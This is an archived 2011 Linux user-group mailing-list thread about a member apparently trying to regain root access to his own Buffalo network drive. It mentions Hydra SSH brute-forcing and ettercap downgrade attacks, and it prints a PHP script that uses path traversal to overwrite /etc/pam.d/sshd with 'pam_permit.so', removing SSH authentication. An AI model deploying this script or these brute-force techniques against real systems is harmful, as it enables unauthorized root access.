Is it possible to extract the root password from the file system?

Lisa Kachold lisakachold at obnosis.com
Mon Jul 18 21:20:21 MST 2011 

I believe the script.php has to be moved the webroot directory and given
permissions there I believe, but well if you can't get a login via ssh... --
how to do it?

On Sun, Jul 17, 2011 at 8:58 AM, Mark Phillips
<mark at phillipsmarketing.biz>wrote:

> On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold <lisakachold at obnosis.com>wrote:
>
>> There are alot of password files and dictionary lists on various sites.
>> Backtrack5 contains a good number.
>>
>> But I imagine that it's either not allowing root via ssh or you have the
>> wrong username.
>>
>
> It turns out the box is smarter than a fifth grader.....after a few hydra
> attacks, it started rejecting all the hydra attempts to ssh in via root.
> Once I stopped hydra (after running all night), it took a couple of hours
> before it would respond to ssh attempts from root. It now will ask for the
> root password, but I still have no idea what it is.
>
>>
>> Or it's a truely random string.
>>
> It could be....the password for the zip file to unzip the file system is
>
>  YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4
>
> . Someone retrieved it using a disassembler on the file system.
>
> I did some more reading, and one person was able to use php to allow ssh
> login. The box allows one to create a web space, and it comes with php
> installed. One can edit the php.ini file, and I can upload via ftp a php
> script. The script they suggested is:
> <?php
> $file = '../../../../etc/pam.d/sshd';
> $fh=fopen($file, 'w') or die("can't open file");
> $stringData = "account  required   pam_unix.so\n";
> fwrite($fh, $stringData);
> $stringData = "session  required   pam_unix.so\n";
> fwrite($fh, $stringData);
> $stringData = "auth required pam_permit.so\n";
> fwrite($fh, $stringData);
> fclose($fh);
> ?>
>
> I uploaded the script, but I get a 404 File not Found when I access the
> page. I thought it might be a file permission error since the file is only
> rw. I tried chmod 777 at the ftp prompt, and got the error message File not
> Found, but ls shows it is there.
>
> ftp> ls
> 200 PORT command successful
> 150 Opening ASCII mode data connection for file list
> drwxrwxrwx   2 apache   apache          6 Jul 17 08:23 cgi-bin
> drwxrwxrwx   2 apache   apache         22 Jul 17 08:23 htdocs
> drwxrwxrwx   2 apache   apache         39 Jul 17 08:23 log
> -rw-rw-rw-   1 hammerhead hdusers       335 Jul 17 08:49 script.php
> 226 Transfer complete
> ftp> chmod 777 script.php
> 550 CHMOD 777 script.php: No such file or directory
> ftp>
>
> Is there anything I can change in the php.ini file to make this script
> execute? Or, am I missing something else?
>
> BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead.
>
> Thanks,
>
> Mark
>
>>
>> On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips <
>> mark at phillipsmarketing.biz> wrote:
>>
>>> Since this is a drive buffalo, I might try ettercap ssh downgrade attack:
>>>>
>>>> http://openmaniak.com/ettercap_filter.php
>>>> ttp://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade
>>>>
>>>> Not sure how a man in the middle attack will work, since I don't know
>>> the password to begin with...
>>>
>>> Or Hydra:
>>>>
>>>> Hydra Instructions:
>>>>
>>>> http://www.youtube.com/watch?v=7CP-JB4QARo
>>>>
>>>>>
>>>>>> Hydra is promising. I tried it with the common passwords list from
>>> openwall. No luck. Do you have any better password lists?
>>>
>>> Thanks,
>>>
>>> Mark
>>>
>>> ---------------------------------------------------
>>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>>> To subscribe, unsubscribe, or to change your mail settings:
>>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>>
>>
>>
>>
>> --
>> (602) 791-8002  Android
>> (623) 239-3392 Skype
>> (623) 688-3392 Google Voice
>> **
>> HomeSmartInternational.com <http://www.homesmartinternational.com>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>



-- 
(602) 791-8002  Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice
**
HomeSmartInternational.com <http://www.homesmartinternational.com>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20110718/93c71cef/attachment.html>

More information about the PLUG-discuss mailing list